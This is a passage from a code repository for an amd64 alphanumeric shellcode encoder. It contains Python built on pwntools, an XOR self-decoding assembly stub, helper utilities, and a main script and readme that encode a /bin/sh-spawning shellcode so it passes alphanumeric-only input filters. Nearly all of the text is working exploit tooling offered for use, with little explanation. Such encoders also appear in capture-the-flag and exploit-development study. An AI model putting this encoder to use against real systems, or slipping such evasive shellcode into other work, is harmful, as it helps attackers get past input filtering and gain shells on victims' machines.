366 |             num = 0xffffffffffffffff ^ (0x10000000000000000 + self.number)
367 |             if self.number <= 0xffff:
368 |                 shellcode += FastNumGen(num)
369 |             else:
370 |                 shellcode += NumGen(num)
371 | 
372 |             shellcode += '''
373 | push rsp
374 | pop rcx
375 | push r15
376 | pop rdx
377 | '''
378 |             shellcode += '''
379 | xor rdx, [rcx+0x30]
380 | xor [rcx+0x30], rdx
381 | xor rax, [rcx+0x30]
382 | '''
383 |         return shellcode
384 | 
385 | 
386 | class Padding(Shellcode):
387 |     padding = '''
388 | push rax
389 | pop rax
390 | '''
391 | 
392 |     def __init__(self, size):
393 |         self.size = size
394 | 
395 |     @cached_property
396 |     def code(self):
397 |         shellcode = ''
398 |         shellcode += self.padding * (self.size // 2)
399 |         if self.size % 2 == 1:
400 |             shellcode += "push rax\n"
401 |         return shellcode
402 | 
403 | 
404 | class ShellCodeXor(Shellcode):
405 |     def __init__(self, code_length):
406 |         self.code_length = code_length
407 | 
408 |     @cached_property
409 |     def code(self):
410 |         xor_encoder_template = ''
411 | 
412 |         xor_encoder_template += str(AutoNumGen(self.code_length))
413 |         xor_encoder_template += '''
414 |     push rax
415 |     pop rcx
416 |     '''
417 | 
418 |         xor_encoder_template += '''
419 |     / save rsp t0 r9
420 |     push rsp
421 |     pop r9
422 |     
423 |     push 0x30
424 |     pop rax
425 |     xor al, 0x30
426 |     xor rax, [r9+0x30]
427 |     xor [r9+0x30], rax
428 |     lea rsp, [rip + data + 8]
429 |     xor [r9+0x30], rsp  # we save rsp addr to [r9+0x30]
430 |     
431 | xor_loop:
432 |     pop rax
433 |     imul rax, rax, 16
434 |     
435 |     / clean rsi
436 |     push rsi
437 |     push rsp
438 |     pop rdx
439 |     xor rsi, [rdx]
440 |     pop r8
441 |     
442 |     / mov rsi, rax
443 |     push rax
444 |     xor rsi, [rdx]
445 |     pop r8
446 |     
447 |     / mov rsp, rdx
448 |     push rsp
449 |     pop rdx
450 |     
451 |     xor rsi, [rdx]
452 |     pop rax
453 |     
454 |     / xarg rsp, [r9+0x30]
455 |     xor rsp, [r9+0x30]
456 |     xor [r9+0x30], rsp
457 |     xor rsp, [r9+0x30]
458 |     
459 |     / save data to [r9+0x30] 
460 |     push rsi
461 |     pop rax
462 |     pop rax
463 |     
464 |     / xarg rsp, [r9+0x30]
465 |     xor rsp, [r9+0x30]
466 |     xor [r9+0x30], rsp
467 |     xor rsp, [r9+0x30]
468 |     
469 |     loop xor_loop
470 |     
471 | data:
472 | '''
473 |         return xor_encoder_template
474 | 
475 |     @staticmethod
476 |     def shellcode_xor(shellcode: bytes):
477 |         enc_code = b"a" * 8
478 |         shellcode = util.asm("mov rsp, r9") + shellcode + b"\x90" * 8
479 |         for i in range(len(shellcode) // 8):
480 |             data = shellcode[:8]
481 |             shellcode = shellcode[8:]
482 |             c1, c2 = ShellCodeXor.shift_xor(data)
483 |             enc_code += c1 + c2
484 |         return enc_code
485 | 
486 |     @staticmethod
487 |     def shift_xor(data: bytes):
488 |         assert len(data) == 8
489 | 
490 |         def get_code(low_8bit):
491 |             return next(filter(lambda x: x & 0xf == low_8bit, util.alphanum_pool))
492 | 
493 |         code_array1 = []
494 |         code_array2 = []
495 |         init_num = 0
496 |         for i in range(8):
497 |             b = (data[i] ^ init_num) & 0xf
498 |             code = get_code(b)
499 |             code_array1.append(code)
500 |             b2 = (data[i] ^ code) >> 4
501 |             code2 = get_code(b2)
502 |             code_array2.append(code2)
503 |             init_num = code2 >> 4
504 | 
505 |         return bytes(code_array2), bytes(code_array1)
506 | 


--------------------------------------------------------------------------------
/encoder/util.py:
--------------------------------------------------------------------------------
 1 | import pwn
 2 | import itertools
 3 | from pwn import asm
 4 | import functools
 5 | import struct
 6 | 
 7 | alphanum_pool = b"UVWXYZABCDEFGHIJKLMNOPQRSTabcdefghijklmnopqrstuvwxyz0123456789"
 8 | pwn.context.arch = "amd64"
 9 | 
10 | xor_table = [0] * 0x80
11 | for i in itertools.product(alphanum_pool, repeat=2):
12 |     n = i[0] ^ i[1]
13 |     xor_table[n] = i
14 | xor_table = xor_table
15 | 
16 | 
17 | def num_size(num: int):
18 |     assert num >= 0
19 |     if num <= 0xff:
20 |         return 1
21 |     elif num <= 0xffff:
22 |         return 2
23 |     elif num <= 0xffffffff:
24 |         return 4
25 |     elif num <= 0xffffffffffffffff:
26 |         return 8
27 |     else:
28 |         raise Exception("size out of range")
29 | 
30 | 
31 | def is_alphanumeric(num: int, size: int):
32 |     for i in range(size):
33 |         if num & 0xff not in alphanum_pool:
34 |             return False
35 |         num = num >> 8
36 |     return num == 0
37 | 
38 | 
39 | def mul_iter():
40 |     # 1. try one byte * one byte
41 |     for i in itertools.combinations_with_replacement(alphanum_pool, 2):
42 |         yield i
43 | 
44 |     numbers = map(lambda x: (x[0] << 8) + x[1], itertools.product(alphanum_pool, repeat=2))
45 |     # 2. try two byte * one byte
46 |     for i in itertools.product(numbers, alphanum_pool):
47 |         yield i
48 | 
49 |     # 3. try two byte * two byte
50 |     for i in itertools.combinations_with_replacement(numbers, 2):
51 |         yield i
52 | 
53 | 
54 | def pack(data: int, fmt):
55 |     return struct.pack(fmt, data)
56 | 
57 | 
58 | def unpack(data: bytes, fmt):
59 |     return struct.unpack(fmt, data)[0]
60 | 
61 | 
62 | p8 = functools.partial(pack, fmt="<B")
63 | p16 = functools.partial(pack, fmt="<H")
64 | p32 = functools.partial(pack, fmt="<I")
65 | p64 = functools.partial(pack, fmt="<Q")
66 | 
67 | u8 = functools.partial(unpack, fmt="<B")
68 | u16 = functools.partial(unpack, fmt="<H")
69 | u32 = functools.partial(unpack, fmt="<I")
70 | u64 = functools.partial(unpack, fmt="<Q")
71 | 


--------------------------------------------------------------------------------
/main.py:
--------------------------------------------------------------------------------
 1 | import pwn
 2 | from encoder import encode
 3 | 
 4 | pwn.context.arch = "amd64"
 5 | alphanum_pool = b"UVWXYZABCDEFGHIJKLMNOPQRSTabcdefghijklmnopqrstuvwxyz0123456789"
 6 | 
 7 | if __name__ == "__main__":
 8 |     sh = pwn.asm(pwn.shellcraft.amd64.linux.sh())
 9 |     e = encode(shellcode=sh, base_reg="rax", offset=0)
10 |     print(e)
11 |     print(pwn.hexdump(e))
12 |     print(pwn.disasm(e))
13 | 


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | encode a amd64 shellcode to alphanumeric shellcode
 2 | 
 3 | # usage
 4 | ```python
 5 | if __name__ == '__main__':
 6 |     sh = pwn.asm(pwn.shellcraft.amd64.linux.sh())
 7 |     print(encode(sh, base_reg = "rax", offset = 0))
 8 | ```
 9 | 
10 | 1. the base_reg is the register point to shellcode.
11 | 
12 | 2. the offset if the offset between baes_reg and the start of shellcode
13 |  
14 | 3. offset can be negative or any other number's, but a too large number will increase the length of shellcode
15 | 
16 | 4. to use this encoder, the rsp must point to stack or other r/w memory that not overlap shellcode itself 
17 | 


--------------------------------------------------------------------------------